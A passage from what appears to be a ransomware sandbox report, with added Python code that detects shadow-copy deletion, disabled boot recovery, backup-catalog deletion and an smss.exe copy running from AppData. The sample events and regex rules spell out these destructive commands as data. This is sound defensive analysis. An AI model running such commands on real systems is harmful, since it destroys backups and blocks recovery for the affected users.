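     "cmdline": r'"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -start'},
    {"pid": 1824, "ppid": 4040, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete'},
    {"pid": 2976, "ppid": 1824, "image": r"C:\Windows\SysWOW64\Wbem\WMIC.exe",
     "cmdline": "wmic shadowcopy delete"},
    {"pid": 3604, "ppid": 4040, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no'},
    {"pid": 1900, "ppid": 4040, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures'},
    {"pid": 3732, "ppid": 4040, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet'},
    {"pid": 3032, "ppid": 4040, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet'},
    {"pid": 3124, "ppid": 3032, "image": r"C:\Windows\SysWOW64\vssadmin.exe",
     "cmdline": "vssadmin delete shadows /all /quiet"},
    {"pid": 5000, "ppid": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /C vssadmin list shadows"},          # benign: read-only query
    {"pid": 5001, "ppid": 1, "image": r"C:\Windows\System32\smss.exe",
     "cmdline": r"\SystemRoot\System32\smss.exe"},           # benign: the real Session Manager
]

# One rule per recovery-inhibition technique seen in the report (ATT&CK T1490).
RECOVERY_RULES = {
    "vssadmin_delete_shadows": re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I),
    "wmic_shadowcopy_delete": re.compile(r"\bwmic(\.exe)?\s+shadowcopy\s+delete\b", re.I),
    "bcdedit_disable_recovery": re.compile(
        r"\bbcdedit(\.exe)?\s+/set\s+\{default\}\s+"
        r"(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b", re.I),
    "wbadmin_delete_catalog": re.compile(r"\bwbadmin(\.exe)?\s+delete\s+catalog\b", re.I),
}

# Core Windows process names that only ever run from the system directory.
# Illustrative list (an assumption of this example); extend it from your own baseline.
SYSTEM_ONLY_NAMES = {"smss.exe", "csrss.exe", "wininit.exe", "winlogon.exe", "lsass.exe", "services.exe"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")


def masquerades_as_system_process(image: str) -> bool:
    """True when a protected system-process name runs from outside System32/SysWOW64."""
    folder, _, name = image.lower().rpartition("\\")
    return name in SYSTEM_ONLY_NAMES and folder not in SYSTEM_DIRS


def root_pid(event: dict, by_pid: dict) -> int:
    """Walk the parent chain to the oldest ancestor we have a record for."""
    cur = event
    while cur["ppid"] in by_pid:
        cur = by_pid[cur["ppid"]]
    return cur["pid"]


def assess(events) -> dict:
    """Group rule hits by process-tree root and give each tree a verdict.

    Returns {root_pid: {"rules": [...], "verdict": str}} for trees with at least
    one hit. Two or more distinct recovery-inhibition techniques from one tree is
    the ransomware pattern above; a single hit is surfaced for human review.
    """
    by_pid = {e["pid"]: e for e in events}
    hits = defaultdict(set)
    for e in events:
        root = root_pid(e, by_pid)
        for name, rx in RECOVERY_RULES.items():
            if rx.search(e["cmdline"]):
                hits[root].add(name)
        if masquerades_as_system_process(e["image"]):
            hits[root].add("system_process_name_outside_system_dir")
    result = {}
    for root, names in hits.items():
        recovery = names & set(RECOVERY_RULES)
        if len(recovery) >= 2:
            verdict = "likely ransomware: multiple recovery-inhibition techniques"
        elif recovery:
            verdict = "review: single recovery-inhibition command"
        else:
            verdict = "review: suspicious process only"
        result[root] = {"rules": sorted(names), "verdict": verdict}
    return result


if __name__ == "__main__":
    for root, info in assess(EVENTS).items():
        print(root, info["verdict"], info["rules"])
```

Grouping by tree root is what keeps the benign "vssadmin list shadows" and the genuine System32 smss.exe out of the result while the single tree rooted at PID 4040 collects all four techniques plus the masquerade.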
Downloads

Note: the CryptnetUrlCache entries below are CryptoAPI certificate/CRL cache files that Windows writes while validating the HTTPS connection; they are side effects of the download, not payloads. The INetCache .htm files are WinINet-cached HTTP responses. The attacker-supplied artifacts are jbqvTZJz.exe, its copy smss.exe (identical hashes) and ~temp001.bat.
• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB
  MD5: 3903600a51d4f986b4302a602d42634b
  SHA1: 0ffcdcba49bfe7ed35695bc6092d72eae2db457b
  SHA256: b509c38c1328732e6b2cf75fe5baa76764a6c5aaea721da222b5caaaac4ecc8e
  SHA512: 459d03ff9961ebf926e591ed4fd08cfd0f5ec1518b16427ad7b2f1bdf5c6f2188b1f288dafcbcf4620a8a7c53ec4c995fc31cf1329bebf6dec7cc88ae33a7b4f

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE
  MD5: 3c9ad8d57554c33ab612c69aef4ce7e1
  SHA1: 93f176d8825c9b8b70bb040079b4497457d04b82
  SHA256: d21639d8e234be42f0db58da90ef5852064bd2b98f88c7c848d672bf8bbd1ece
  SHA512: 94791fcc6564db7929e2f3ea7c1c093872df24728561320e5341b9e8b7088e2b53a3c71e6e4bcd34663860a490875a7c285e9ba0990afb83388da9214af1362e

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
  MD5: 3e9f22cc690a8f0a85c77641e868fa63
  SHA1: fe20510f5f24bdcf66183653b9b8b4f12581530c
  SHA256: 8f71c8b1d3dfc7997d945b8ffa1331874246cb0fc64f56eb2a25c9fa0b978ef9
  SHA512: a96110ee91309ab8a15df7e5ecef220cfc2289180c54c789ceb148cc6a74c2c1339a3271267611ee963556d2c8c824d3274bcdb92c7476bb10a7553ade121e62

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB
  MD5: 5853495819c12953e611cca9d1df20a6
  SHA1: c2ab03e520baca02509d13b874f98a11eccbf97a
  SHA256: af4ad165f956d9f4b0b28fe3cf109d22e037152261bb132b01759abbfff193c4
  SHA512: 1e7b4a55632b53ceb18ab909df68fe8e21e4a3e50b6b4b7e44da3e662da2b6f1142ad2aa2e022f8efe0702fbaaf05eb8767df6dae76599973fa8b10f58e2be44

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE
  MD5: 0e8dd2e802d289d7fad334886926dfe0
  SHA1: 3c7e37b0574f1af35590b516a5e1c85ef25ca6e3
  SHA256: 982c8039205a17211233ad08a1e271fa8370f263d0bcf633695e5ec7b139380d
  SHA512: 888d17cb6f3dd87cbaa9480a4846df9b7517ec9e29ba0a44c295760b8470221cd3ba9b77450252e83bb4a5001f6d7cda5ee842d895ee49b611a424bb96d59bf6

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
  MD5: 9773b0bfd3bc9fd0e830c05f6866c343
  SHA1: 8f49992bcf3e421e5fe988806cc3e0613a321e3a
  SHA256: b730c7e0aac4cb57181ea00b923a96ad563f5fb5774f1f767eede0edfd5e6cbc
  SHA512: 1561825209673dcecd583105dd378417febeaa802737c622cdbdd05bd86a4d52c5ccc67595de3bb9437193b0becd9e5cb1a9406821dd4f92a2c8610bf31bc10f

• C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DRMDU4BX\EEUV2G9N.htm
  MD5: b1cd7c031debba3a5c77b39b6791c1a7
  SHA1: e5d91e14e9c685b06f00e550d9e189deb2075f76
  SHA256: 57ba053f075e0b80f747f3102ed985687c16a8754d109e7c4d33633269a36aaa
  SHA512: d2bbefdc1effb52a38964c4cec5990a5a226248eca36f99e446c0c5704436f666bf1cb514e73b8991411d497d3325ecc646cbd5065c364e92ab6b9c5f1ad4a72

• C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZIIA2USJ\YSR9BGOA.htm
  MD5: 8615e70875c2cc0b9db16027b9adf11d
  SHA1: 4ed62cf405311c0ff562a3c59334a15ddc4f1bf9
  SHA256: da96949ba6b0567343f144486505c8c8fa1d892fd88c9cbc3ef3d751a570724d
  SHA512: cd9dfc88dc2af9438b7d6b618d1b62029b3bdf739fc4daa5b37397afd12c4528561b3bf2fc3f3f2adf3fd1f582d5524332441fd30248fcd078e41aa91e17cb73

• C:\Users\Admin\AppData\Local\Temp\jbqvTZJz.exe
  MD5: de904e0d5b71c0c3d99430b61d40aae2
  SHA1: 5e1add3f70404f2110c389674e481484365eead4
  SHA256: 43812b98e4f9480d25b426a23a7b4d2a4e498110545c7a3cb21159bf75c18e7b
  SHA512: 25f086b82e86fcef30474d13e723980f43fccdd473b0e3f556b78b434494c2b22a3e3b765fbf2647aeb030e814a1eea1fdfe6d35e894449880780d6f3732d3f0

                  • C:\Users\Admin\AppData\Local\Temp\~temp001.bat

                    MD5

                    ef572e2c7b1bbd57654b36e8dcfdc37a

                    SHA1

                    b84c4db6d0dfd415c289d0c8ae099aea4001e3b7

                    SHA256

                    e6e609db3f387f42bfd16dd9e5695ddc2b73d86ae12baf4f0dfc4edda4a96a64

                    SHA512

                    b8c014b242e8e8f42da37b75fe96c52cd25ebd366d0b5103bcba5ac041806d13142a62351edecdee583d494d2a120f9b330f6229b1b5fe820e1c7d98981089e9

                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe

                    MD5

                    de904e0d5b71c0c3d99430b61d40aae2

                    SHA1

                    5e1add3f70404f2110c389674e481484365eead4

                    SHA256

                    43812b98e4f9480d25b426a23a7b4d2a4e498110545c7a3cb21159bf75c18e7b

                    SHA512

                    25f086b82e86fcef30474d13e723980f43fccdd473b0e3f556b78b434494c2b22a3e3b765fbf2647aeb030e814a1eea1fdfe6d35e894449880780d6f3732d3f0

                  • memory/1148-171-0x0000000000D00000-0x0000000000E44000-memory.dmp

                  • memory/1148-169-0x0000000000000000-mapping.dmp

                  • memory/1824-163-0x0000000000000000-mapping.dmp

                  • memory/1900-165-0x0000000000000000-mapping.dmp

                  • memory/2764-120-0x00000278B04A0000-0x00000278B04A1000-memory.dmp

                  • memory/2764-115-0x0000000000000000-mapping.dmp

                  • memory/2764-132-0x00000278AEB20000-0x00000278AEB22000-memory.dmp

                  • memory/2764-133-0x00000278AEB23000-0x00000278AEB25000-memory.dmp

                  • memory/2764-126-0x00000278C94B0000-0x00000278C94B1000-memory.dmp

                  • memory/2764-134-0x00000278AEB26000-0x00000278AEB28000-memory.dmp

                  • memory/2832-168-0x0000000000000000-mapping.dmp

                  • memory/2892-174-0x0000000000000000-mapping.dmp

                  • memory/2960-114-0x0000000000000000-mapping.dmp

                  • memory/2976-175-0x0000000000000000-mapping.dmp

                  • memory/3032-167-0x0000000000000000-mapping.dmp

                  • memory/3124-173-0x0000000000000000-mapping.dmp

                  • memory/3272-176-0x0000000000000000-mapping.dmp

                  • memory/3588-162-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

                  • memory/3588-152-0x0000000000000000-mapping.dmp

                  • memory/3604-164-0x0000000000000000-mapping.dmp

                  • memory/3732-166-0x0000000000000000-mapping.dmp

                  • memory/3924-147-0x0000000000BB0000-0x0000000000CF4000-memory.dmp

                  • memory/3924-148-0x0000000000400000-0x000000000054B000-memory.dmp

                  • memory/3924-143-0x0000000000000000-mapping.dmp

                  • memory/4040-161-0x0000000000E00000-0x0000000000F44000-memory.dmp

                  • memory/4040-149-0x0000000000000000-mapping.dmp
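The dropped-files list above shows the same binary (SHA256 43812b98…) written first to %LOCALAPPDATA%\Temp\jbqvTZJz.exe and then to %APPDATA%\Microsoft\Windows\smss.exe, i.e. the payload is re-staged under the name of a Windows system process outside the system directories. The following is an added example, not part of the sandbox report, that correlates such a listing to flag both patterns. The records are the (path, SHA256) pairs from this report; the set of system-process names and system directories is an assumption chosen for illustration.

```python
"""Correlate a sandbox 'dropped files' listing for two common ransomware
staging tells: the same hash re-written under a second path, and a filename
that imitates a Windows system process outside System32/SysWOW64.
Added example; the records below are copied from the report above."""
from collections import defaultdict
from pathlib import PureWindowsPath

# (path, SHA256) records taken from the report's dropped-files list.
DROPPED = [
    (r"C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZIIA2USJ\YSR9BGOA.htm",
     "da96949ba6b0567343f144486505c8c8fa1d892fd88c9cbc3ef3d751a570724d"),
    (r"C:\Users\Admin\AppData\Local\Temp\jbqvTZJz.exe",
     "43812b98e4f9480d25b426a23a7b4d2a4e498110545c7a3cb21159bf75c18e7b"),
    (r"C:\Users\Admin\AppData\Local\Temp\~temp001.bat",
     "e6e609db3f387f42bfd16dd9e5695ddc2b73d86ae12baf4f0dfc4edda4a96a64"),
    (r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe",
     "43812b98e4f9480d25b426a23a7b4d2a4e498110545c7a3cb21159bf75c18e7b"),
]

# Assumption for this example: core Windows process names that legitimately
# live only under the system directories below.
SYSTEM_PROCESS_NAMES = {
    "smss.exe", "csrss.exe", "wininit.exe", "winlogon.exe",
    "services.exe", "lsass.exe", "svchost.exe", "explorer.exe",
}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\")


def group_by_hash(records):
    """Map each SHA256 (lower-cased) to the set of paths it was written to."""
    groups = defaultdict(set)
    for path, sha256 in records:
        groups[sha256.lower()].add(path)
    return groups


def find_renamed_copies(records):
    """Hashes written under more than one path: the payload being re-staged
    (here jbqvTZJz.exe reappearing as smss.exe). Returns {sha256: sorted paths}."""
    return {h: sorted(paths) for h, paths in group_by_hash(records).items()
            if len(paths) > 1}


def find_masquerading(records):
    """Paths whose filename is a system-process name but which sit outside the
    Windows system directories (a user-writable %APPDATA% smss.exe is never legitimate)."""
    hits = set()
    for path, _ in records:
        name = PureWindowsPath(path).name.lower()
        if name in SYSTEM_PROCESS_NAMES and not path.lower().startswith(SYSTEM_DIRS):
            hits.add(path)
    return sorted(hits)


def ioc_hashes(records):
    """The de-duplicated SHA256 set to feed a hash blocklist or EDR search."""
    return sorted({sha256.lower() for _, sha256 in records})


if __name__ == "__main__":
    for h, paths in find_renamed_copies(DROPPED).items():
        print(f"same binary {h[:12]}... dropped at:")
        for p in paths:
            print(f"    {p}")
    for p in find_masquerading(DROPPED):
        print(f"system-process name outside system dirs: {p}")
```

On a real host the same two checks run over Sysmon Event ID 11 (FileCreate) or EDR file-write telemetry in place of the sandbox listing; the SHA256 list from `ioc_hashes` is what gets pushed to a blocklist.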